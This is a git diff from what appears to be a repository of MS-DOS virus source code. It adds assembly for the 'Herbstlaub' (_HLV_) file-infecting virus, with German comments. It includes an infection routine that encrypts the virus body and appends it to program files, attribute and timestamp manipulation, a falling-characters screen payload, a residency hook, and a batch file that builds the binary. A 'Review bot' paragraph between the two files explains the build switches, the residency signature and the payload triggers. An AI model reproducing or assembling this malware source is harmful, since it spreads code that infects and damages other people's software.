喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 Demo - Version, 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 k e i n Virus. 
喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍 +ENDIF ;----------------; +ELSE ; +IFDEF _DANGER ; +XI_020 MOV AX,MS_GetFileAttr ; + LDS DX,CS:DWORD PTR [Pathname] ; + MSDOS ; + JB XI_018 ; + MOV CS:[File_Attributes],CX ; + XOR CL,Attr_A ; + TEST CL,Attr_ASHR ; + JZ XI_021 ; + MOV AX,MS_SetFileAttr ; + XOR CX,CX ; + MSDOS ; + JB XI_018 ; +XI_021: MOV AX,MS_Open * 100 + Read_Write ; + MSDOS ; + JB XI_018 ; + MOV BX,AX ; + MOV AX,MS_MoveFP * 100 + OfsFrmEnd ; + XOR CX,CX ; + XOR DX,DX ; + MSDOS ; + CALL Append_Virus ; + JNB XI_022 ; + MOV AX,MS_MoveFP * 100 + OfsFrmTop ; + MOV CX,CS:[File_Size_msb] ; + MOV DX,CS:[File_Size_lsb] ; + MSDOS ; + MOV AH,MS_Write ; + XOR CX,CX ; + MSDOS ; + JMP SHORT XI_023 ; +XI_022: MOV AX,MS_MoveFP * 100 + OfsFrmTop ; + XOR CX,CX ; + XOR DX,DX ; + MSDOS ; + JB XI_023 ; + MOV AX,CS:[File_Size_lsb] ; + ADD AX,-2 ; + MOV CS:[FirstOpCode_2],AX ; + MOV AH,MS_Write ; + MOV DX,OFFSET FirstOpCode_1 ; + MOV CX,3 ; + MSDOS ; +XI_023: MOV AX,MS_SetFileDate ; + MOV DX,CS:[File_Date] ; + MOV CX,CS:[File_Time] ; + MSDOS ; + MOV AH,MS_Close ; + MSDOS ; + MOV CX,CS:[File_Attributes] ; + TEST CL,Attr_SHR ; + JNZ XI_024 ; + TEST CL,Attr_A ; + JNZ XI_025 ; +XI_024: MOV AX,MS_SetFileAttr ; + LDS DX,CS:DWORD PTR [Pathname] ; + MSDOS ; +IF2 ;----------------; +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍吧屯屯屯屯屯屯屯屯突鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 KEIN DEMO, 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 scharfer Virus. 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍 +ENDIF ; +ELSE ; + .ERR ; +ENDIF ; +ENDIF ; +IF SWITCHABLE ; +IF2 ; +%Out 喊鞍鞍鞍鞍鞍赏屯屯屯屯褪屯屯屯屯屯屯屯屯褪屯屯屯屯屯话鞍鞍鞍鞍鞍昂 +%Out 喊鞍鞍鞍鞍鞍 Neuer interner MSDOS Befehl '_HLV_' ! 喊鞍鞍鞍鞍鞍昂 +ENDIF ; +ELSE ; +IF2 ; +%Out 喊鞍鞍鞍鞍鞍赏屯屯屯屯褪屯屯屯屯屯屯屯屯褪屯屯屯屯屯话鞍鞍鞍鞍鞍昂 +%Out 喊鞍鞍鞍鞍鞍 Kommando '_HLV_' nicht implementiert. 
喊鞍鞍鞍鞍鞍昂 +ENDIF ; +ENDIF ; +DISPNUM MACRO nu,nuxx ; +%Out 喊鞍鞍鞍鞍鞍 (Monat - Jahr) nu - nuxx 喊鞍鞍鞍鞍鞍昂 +ENDM ; +IF2 ; +%Out 喊鞍鞍鞍鞍鞍 Bis zum Jahresende aktiv ab: 喊鞍鞍鞍鞍鞍昂 +.radix 10 ; +DISPNUM %MONTH,%YEAR ; +.radix 16 ; +%Out 喊鞍鞍鞍鞍鞍韧屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯及鞍鞍鞍鞍鞍昂 +endif ; +XI_025: REST DS,ES,BP,DI,SI,DX,CX,BX,AX,F ;----------------; + JMP XI_014 ; +IF DEMO ; + ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Statt APPEND in der DEMO - Version aufgerufene Prozedur. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +DEMO_INFECT PROC NEAR ; + push ax ; + push cx ; + in al,61 ; + or al,3 ; + out 61,al ; + mov al,0b6 ; + out 43,al ; + mov cx,0a ; +XI_026: dec cx ; + jz XI_030 ; +XI_027: mov ax,200d ; +XI_028: dec ax ; + cmp ax,100d ; + jz XI_031 ; + push ax ; + out 42,al ; + push cx ; + mov cx,150d ; +XI_029: nop ; + loop XI_029 ; + pop cx ; + mov al,ah ; + out 42,al ; + pop ax ; + jmp XI_028 ; +XI_030: in al,61 ; + and al,0fc ; + out 61,al ; + pop cx ; + pop ax ; + ret ; +XI_031: inc ax ; + cmp ax,600d ; + jz XI_026 ; + push ax ; + out 42,al ; + push cx ; + mov cx,150d ; +XI_032: nop ; + loop XI_032 ; + pop cx ; + mov al,ah ; + out 42,al ; + pop ax ; + jmp XI_031 ; +DEMO_INFECT ENDP ; + ; +ELSE ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Append Virus - von der Int21ISR aufgerufene Infektions-Prozdur +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Append_Virus PROC NEAR ; + SAVE ES,BX ; + MOV AH,MS_AllocMem ;----------; + MOV BX,(OFFSET EOFC - OFFSET Crypt1) SHR 4 + 1 ; + MSDOS ;----------; + POP BX ; + JNB XI_034 ; +XI_033: STC ; + POP ES ; + RET ; +XI_034: MOV CS:[Crypt3],EnCrptd ; + MOV ES,AX ; + MOV_S DS,CS ; + XOR DI,DI ; + MOV SI,PSPsize ; + MOV CX,OFFSET EOFC ; + CLD ; + REPZ MOVSB ; + MOV DI,OFFSET XI_003 ; + MOV SI,OFFSET XR_001 ; + ADD SI,[File_Size_lsb] ; + MOV CX,OFFSET EOFC - OFFSET XI_003 ; +XI_035: XOR ES:[DI],SI ; + XOR ES:[DI],CX ; + INC DI ; + INC SI ; + LOOP XI_035 ; + MOV DS,AX ; + MOV AH,MS_Write ; + XOR DX,DX ; + MOV CX,OFFSET EOFC ; + 
MSDOS ; + SAVE F,AX ; + MOV AH,MS_ReleaseMem ; + MSDOS ; + REST AX,F ; + MOV_S DS,CS ; + JB XI_033 ; + CMP AX,CX ; + JNZ XI_033 ; + POP ES ; + CLC ; + RET ; +Append_Virus ENDP ; + ; +ENDIF ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + 'Zufallszahlen' - Generator. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Random PROC NEAR ; + SAVE DS ; + MOV_S DS,CS ; + SAVE BX,CX,DX,AX ; + MOV CX,7 ; + MOV BX,offset LastRandom ; + PUSH [BX] ; +XI_036: MOV AX,[BX-02] ; + ADC [BX],AX ; + DEC BX ; + DEC BX ; + LOOP XI_036 ; + POP AX ; + ADC [BX],AX ; + MOV DX,[BX] ; + POP AX ; + OR AX,AX ; + JZ XI_037 ; + MUL DX ; +XI_037: MOV AX,DX ; + REST DX,CX,BX,DS ; + RET ; +Random ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Zeichen und Attribut aus Videospeicher auslesen. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Load_from_VRAM PROC NEAR ; + SAVE SI,DS,DX ; + MOV AL,DH ; + MUL [Num_of_Col] ; + MOV DH,0 ; + ADD AX,DX ; + SHL AX,1 ; + ADD AX,[Page_offset] ; + MOV SI,AX ; + TEST [Prevent_Snow?],-1 ; + MOV DS,[Seg_of_VRAM] ; + JZ XI_038 ; + Wait_HRI_or_VRI ; +XI_038: LODSW ; + STI ; + REST DX,DS,SI ; + RET ; +Load_from_VRAM ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Zeichen und Attribut (AX) in den Videospeicher schreiben. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Write_to_VRAM PROC NEAR ; + SAVE DI,ES,DX,BX ; + MOV BX,AX ; + MOV AL,DH ; + MUL [Num_of_Col] ; + MOV DH,0 ; + ADD AX,DX ; + SHL AX,1 ; + ADD AX,[Page_offset] ; + MOV DI,AX ; + TEST [Prevent_Snow?],-1 ; + MOV ES,[Seg_of_VRAM] ; + JZ XI_039 ; + Wait_HRI_or_VRI ; +XI_039: MOV AX,BX ; + STOSB ; + STI ; + REST BX,DX,ES,DI ; + RET ; +Write_to_VRAM ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Bit 0 von Port B des 8255 Chips zur乧ksetzen (IO-Adresse : &H61 ). 
+滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Toggle_Speaker PROC NEAR ; + PUSH AX ; + IN AL,PORT_B_8255 ; + XOR AL,02 ; + AND AL,0FE ; + OUT PORT_B_8255,AL ; + POP AX ; + RET ; +Toggle_Speaker ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + CF gesetzt, wenn AL ein nicht darstellbares Zeichen enth刲t. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Is_it_blank_? PROC NEAR ; + CMP AL,0 ; + JZ XI_040 ; + CMP AL,20 ; + JZ XI_040 ; + CMP AL,-1 ; + JZ XI_040 ; + CLC ; + RET ; +XI_040: STC ; + RET ; +Is_it_blank_? ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + CF gesetzt, wenn AL ein Zeichen aus dem Linienzeichensatz enth刲t. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Spec_Graphik? PROC NEAR ; + CMP AL,0B0 ; + JB XI_041 ; + CMP AL,0DF ; + JA XI_041 ; + STC ; + RET ; +XI_041: CLC ; + RET ; +Spec_Graphik? ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Geschwindigkeit der Maschine ( zur Verwendung in DELAY ) ermitteln. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +GetSysSpeed PROC NEAR ; + PUSH DS ; + MOV AX,BIOSDATASEG ; + MOV DS,AX ; + STI ; + MOV AX,[B_TIMERVAR] ; +XI_042: CMP AX,[B_TIMERVAR] ; + JZ XI_042 ; + XOR CX,CX ; + MOV AX,[B_TIMERVAR] ; +XI_043: INC CX ; + JZ XI_045 ; + CMP AX,[B_TIMERVAR] ; + JZ XI_043 ; +XI_044: POP DS ; + MOV AX,CX ; + XOR DX,DX ; + MOV CX,0F ; + DIV CX ; + MOV CS:[Speed],AX ; + RET ; +XI_045: DEC CX ; + JMP XI_044 ; +GetSysSpeed ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Verz攇ern ( Verz攇erungszeit ist kaum maschinenabh刵gig ). +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Delay PROC NEAR ; + PUSH CX ; +XI_046: PUSH CX ; + MOV CX,[Speed] ; +XI_047: LOOP XI_047 ; + POP CX ; + LOOP XI_046 ; + POP CX ; + RET ; +Delay ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Eine neue Interrupt 1C(h) Behandlungsroutine. 
+滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +XI_048 LABEL NEAR ; +XR_009 EQU XI_048 + PSPsize ;----------; + TEST CS:[ISR_Flags],MASK R_in_1c OR MASK ExtCom ; + JZ XI_049 ;----------; + JMP XI_067 ; +XI_049: OR CS:[ISR_Flags],MASK R_in_1c ; + DEC CS:[XR_002] ; + JZ XI_050 ; + JMP XI_066 ; +XI_050: SAVE DS,ES ; + MOV_S DS,CS ; + MOV_S ES,CS ; + SAVE AX,BX,CX,DX,SI,DI,BP ; + MOV AL,EOI_8259A ; + OUT PORT_B_8259A,AL ; + MOV AX,[XR_003] ; + CMP AX,0438 ; + JNB XI_051 ; + MOV AX,0438 ; +XI_051: CALL Random ; + INC AX ; + MOV [XR_002],AX ; + MOV [XR_003],AX ; + PUSH DS ; + MOV AX,BIOSDATASEG ; + MOV DS,AX ; + MOV AX,[B_VidPage] ; + POP DS ; + MOV [Page_offset],AX ; + MOV [Last_Line],18 ; + MOV DL,-1 ; + MOV AX,1130 ; + MOV BH,0 ; + SAVE ES,BP ; + INT 10 ; + REST BP,ES ; + CMP DL,-1 ; + JZ XI_052 ; + MOV [Last_Line],DL ; +XI_052: CALL GetSysSpeed ; + MOV AH,0F ; + INT 10 ; + MOV [Num_of_Col],AH ; + MOV [Prevent_Snow?],0 ; + MOV [Seg_of_VRAM],MonoBase ; + CMP AL,07 ; + JZ XI_054 ; + JB XI_053 ; + JMP XI_064 ; +XI_053: MOV [Seg_of_VRAM],ColorBase ; + CMP AL,03 ; + JA XI_054 ; + CMP AL,02 ; + JB XI_054 ; + MOV [Prevent_Snow?],01 ; + MOV AL,[Last_Line] ; + INC AL ; + MUL [Num_of_Col] ; + MOV [Num_of_char],AX ; + MOV AX,[XR_004] ; + CMP AX,[Num_of_char] ; + JBE XI_054 ; + MOV AX,[Num_of_char] ; +XI_054: CALL Random ; + INC AX ; + MOV SI,AX ; +XI_055: XOR DI,DI ; +XI_056: INC DI ; + MOV AX,[Num_of_char] ; + SHL AX,1 ; + CMP DI,AX ; + JBE XI_057 ; + JMP XI_064 ; +XI_057: OR [ISR_Flags],MASK Recf_1 ; + MOV AL,[Num_of_Col] ; + MOV AH,0 ; + CALL Random ; + MOV DL,AL ; + MOV AL,[Last_Line] ; + MOV AH,0 ; + CALL Random ; + MOV DH,AL ; + CALL Load_from_VRAM ; + CALL Is_it_blank_? ; + JB XI_056 ; + CALL Spec_Graphik? ; + JB XI_056 ; + MOV [Last_Pair],AX ; + MOV CL,[Last_Line] ; + MOV CH,0 ; +XI_058: INC DH ; + CMP DH,[Last_Line] ; + JA XI_062 ; + CALL Load_from_VRAM ; + CMP AH,[Last_Attr] ; + JNZ XI_062 ; + CALL Is_it_blank_? ; + JB XI_060 ; +XI_059: CALL Spec_Graphik? 
; + JB XI_062 ; + INC DH ; + CMP DH,[Last_Line] ; + JA XI_062 ; + CALL Load_from_VRAM ; + CMP AH,[Last_Attr] ; + JNZ XI_062 ; + CALL Is_it_blank_? ; + JNB XI_059 ; + CALL Toggle_Speaker ; + DEC DH ; + CALL Load_from_VRAM ; + MOV [Last_Char],AL ; + INC DH ; +XI_060: AND [ISR_Flags],NOT MASK Recf_1 ; + DEC DH ; + MOV AL,' ' ; + CALL Write_to_VRAM ; + INC DH ; + MOV AL,[Last_Char] ; + CALL Write_to_VRAM ; + JCXZ XI_061 ; + CALL Delay ; + DEC CX ; +XI_061: JMP XI_058 ; +XI_062: TEST [ISR_Flags],MASK Recf_1 ; + JZ XI_063 ; + JMP XI_056 ; +XI_063: CALL Toggle_Speaker ; + DEC SI ; + JZ XI_064 ; + JMP XI_055 ; +XI_064: IN AL,PORT_B_8255 ; + AND AL,0FC ; + OUT PORT_B_8255,AL ; + MOV AX,3 ; + CALL Random ; + INC AX ; + MUL [XR_004] ; + JNB XI_065 ; + MOV AX,-1 ; +XI_065: MOV [XR_004],AX ; + REST BP,DI,SI,DX,CX,BX,AX,ES,DS ; +XI_066: AND CS:[ISR_Flags],NOT MASK R_in_1c ; +XI_067: JMP DWORD PTR CS:[Org_Int_1C] ; + ; +IF SWITCHABLE ; + ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Implementierung eines neuen in CMD_2F definierten internen Befehls. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +XI_068 Label Near ; +Int_2F_ISR EQU XI_068 + PSPsize ; + CMP AH,0AEH ; + JNZ Int_2F_end ; + CMP DX,-1 ; + JNZ Int_2F_end ; + CMP AL,0 ; + JNZ Int_2F_2nd ; + CALL Decode_2F ; + JNZ Int_2F_end ; + DEC AL ; + IRET ; +Int_2F_2nd: CMP AL,1 ; + JNZ Int_2F_end ; + CALL Decode_2F ; + JNZ Int_2F_end ; + SAVE DS,DX,AX ; + MOV_S DS,CS ; + XOR [ISR_Flags],MASK ExtCom ; + MOV DX,OFFSET MSG_ON ; + TEST [ISR_Flags],MASK ExtCom ; + JZ XI_069 ; + MOV DX,OFFSET MSG_OFF ; +XI_069: MOV AH,9 ; + MSDOS ; + REST AX,DX,DS ; + AND BYTE PTR [SI],0 ; + IRET ; +Int_2F_end: JMP DWORD PTR CS:[Org_Int_2F] ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + 歜erpr乫en, ob der in CMD_2F definierte Befehl angesprochen wurde. 
+滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Decode_2F PROC NEAR ; + SAVE SI,DI,ES,CX ; + MOV CX,05 ; + MOV_S ES,CS ; + MOV DI,OFFSET Cmd_2F ; + CLD ; + REPE CMPSW ; + REST CX,ES,DI,SI ; + RET ; +Decode_2F ENDP ; + ; +ENDIF ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Okay, das war's. Zum Schlu noch einige Definitionen. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +EOFC EQU THIS WORD ; +XR_010 EQU OFFSET EOFC - 1 + FIRSTBASE ; +TEXT ENDS ; +IF2 ;----------------; +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 +%Out 韧屯屯屯 (C) 1990 164A12565AA18213165556D3125C4B962712 屯屯屯屯图 +ENDIF ; +comment # +赏屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯突 + + So k攏nte ein Batch - Makefile aussehen : + + @cls + @if %1.==. goto nopar + @if not exist %1.asm goto noasm + @ctty nul + @del %1.obj + @del %1.lst + @del %1.crf + @del %1.ref + @del %1.map + @del %1.exe + @del %1.bin + @del _HLV_.COM + @ctty con + @masm /b63 %1,,%1,%1 %2 %3 %4; + @if not exist %1.obj goto masm_err + @link %1,,%1; + @if not exist %1.exe goto link_err + @exe2bin %1; + @if not exist %1.bin goto exe2_err + @cref %1; + @if not exist %1.ref goto cref_err + @echo >> %1.lst + @copy %1.lst+%1.map+%1.ref %1.t > nul + @del %1.lst > nul + @ren %1.t %1.lst > nul + @del %1.obj > nul + @del %1.crf > nul + @del %1.ref > nul + @del %1.map > nul + @del %1.exe > nul + @echo n %1.bin > md.inp + @echo l 11f >> md.inp + @echo a 110 >> md.inp + @echo add cx,20 >> md.inp + @echo. >> md.inp + @echo g =110 113 >> md.inp + @echo f 110 11e 20 >> md.inp + @echo e 110 '%1' >> md.inp + @echo f 100 10f 90 >> md.inp + @echo a 100 >> md.inp + @echo jmp 120 >> md.inp + @echo nop >> md.inp + @echo nop >> md.inp + @echo nop >> md.inp + @echo mov ax,4c00 >> md.inp + @echo int 21 >> md.inp + @echo. >> md.inp + @echo n _HLV_.com >> md.inp + @echo w >> md.inp + @echo q >> md.inp + @debug < md.inp > nul + @cls + @echo. 
+ @echo 赏屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯突 + @echo 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 + @echo 喊鞍鞍鞍MAKEHLV erfolgreich beendet, _HLV_.com wurde erstellt.鞍昂 + @echo 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 + @echo 韧屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯图 + @echo. + @goto ende + :nopar + @echo FEHLER ! Mindestens ein Parameter ist erforderlich ! + @echo Syntax : MAKEHLV asmfile [switches] + @goto ende + :noasm + @echo FEHLER ! Die Datei %1.ASM ist nicht zu finden ! + @goto ende + :masm_err + @echo FEHLER ! %1.OBJ konnte nicht erstellt werden ! + @goto ende + :link_err + @echo FEHLER ! %1.EXE konnte nicht erstellt werden ! + @goto ende + :exe2_err + @echo FEHLER ! %1.BIN konnte nicht erstellt werden ! + @goto ende + :cref_err + @echo FEHLER ! %1.REF konnte nicht erstellt werden ! + :ende + +韧屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯图 +# +END + +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪> and Remember Don't Forget to Call <哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 diff --git a/MSDOS/Virus.MSDOS.Unknown.cascspec.asm b/MSDOS/Virus.MSDOS.Unknown.cascspec.asm new file mode 100644 index 00000000..4ccbc830 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cascspec.asm 
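Review bot: The listing carries no English summary of its build gates and detection handles, which a corpus reader needs before touching it; I would add a short header comment after the `SUBTTL` line. It should state that with `DEMO EQU TRUE` the Exec hook's `XI_020` path calls `DEMO_Infect` (a speaker beep) and the file-append code under `IFDEF _DANGER` is not assembled at all (`.ERR` otherwise), so the `_HLV_.COM` the included batch file builds is the demo; that the residency check is INT 21h AX=4BFFh answered with DI=55AAh, so a resident stub returning that signature stops installation at `CMP DI,Virus_sig`; and that the screen payload is suppressed whenever `ExtCom` is set, i.e. outside September–December 1991 or after the `_HLV_` INT 2Fh (AH=AEh) command toggles it. One consistency nit: the `_DANGER` branch's label is written `XI_020 MOV AX,MS_GetFileAttr` without the colon the DEMO branch's `XI_020:` carries; since that branch is never assembled here I could not confirm whether this MASM version accepts it.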
@@ -0,0 +1,1183 @@ +PAGE 62,132 +TITLE _HLV_ (- Microsoft MASM 5.1 source -) +SUBTTL (C) 1990 164A12565AA18213165556D3125C4B962712 +.RADIX 16 +.LALL + +TRUE EQU 1 +FALSE EQU 0 + +MONTH EQU 9D +YEAR EQU 1991D + +DEMO EQU TRUE + +SWITCHABLE = TRUE +IFDEF _NOSWITCH +SWITCHABLE = FALSE +ENDIF + +comment # +赏屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯突 + + ===================== + H E R B S T L A U B + ===================== + + + SPRACHE: MASM 4.00 (+) [ fr乭ere Versionen brechen z.B. mit + *OUT OF MEMORY* (3.00) ab oder lassen + sogar den PC abst乺zen (1.10) ] + + ( Eine als Beispiel gedachte Batchdatei zur Steuerung der 歜ersetzung + ist am Ende dieses Quelltextes als Kommentar hinzugef乬t. ) + +韧屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯图 +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + W刪rend der 歜ersetzung zu auszugebende Meldungen, 1. Teil. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 +# +IF1 +REPT 50 +%Out +ENDM; +%Out 赏屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯突 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍谀哪哪哪哪哪哪哪哪哪哪哪堪鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 +%Out 喊澳哪哪哪哪哪哪哪哪 H E R B S T L A U B 媚哪哪哪哪哪哪哪哪陌昂 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍滥哪哪哪哪哪哪哪哪哪哪哪侔鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 +ENDIF +comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Einige Assembler - Makros. 
+滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 +# ; +MSDOS MACRO ; + INT 21 ; + ENDM ; +Wait_HRI_or_VRI MACRO ; + LOCAL _X_1, _X_2, _X_3 ; + MOV DX,03DA ; + CLI ; + _X_1: IN AL,DX ; + TEST AL,08 ; + JNZ _X_3 ; + TEST AL,01 ; + JNZ _X_1 ; + _X_2: IN AL,DX ; + TEST AL,01 ; + JZ _X_2 ; + _X_3 LABEL NEAR ; + ENDM ;------; +SAVE MACRO _1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c ; + IRP _X,<_1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c> ; + IFNB <_X> ;------; + IFIDN <_X>, ; + PUSHF ; + ELSE ; + PUSH _X ; + ENDIF ; + ENDIF ; + ENDM ; + ENDM ;------; +REST MACRO _1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c ; + IRP _X,<_1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c> ; + IFNB <_X> ;------; + IFIDN <_X>, ; + POPF ; + ELSE ; + POP _X ; + ENDIF ; + ENDIF ; + ENDM ; + ENDM ; +MOV_S MACRO S1,S2 ; + PUSH S2 ; + POP S1 ; + ENDM ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Start des Code-Segments, Segment Prefix Bytes werden n i c h t au- + tomatisch durch den Assembler erzeugt. 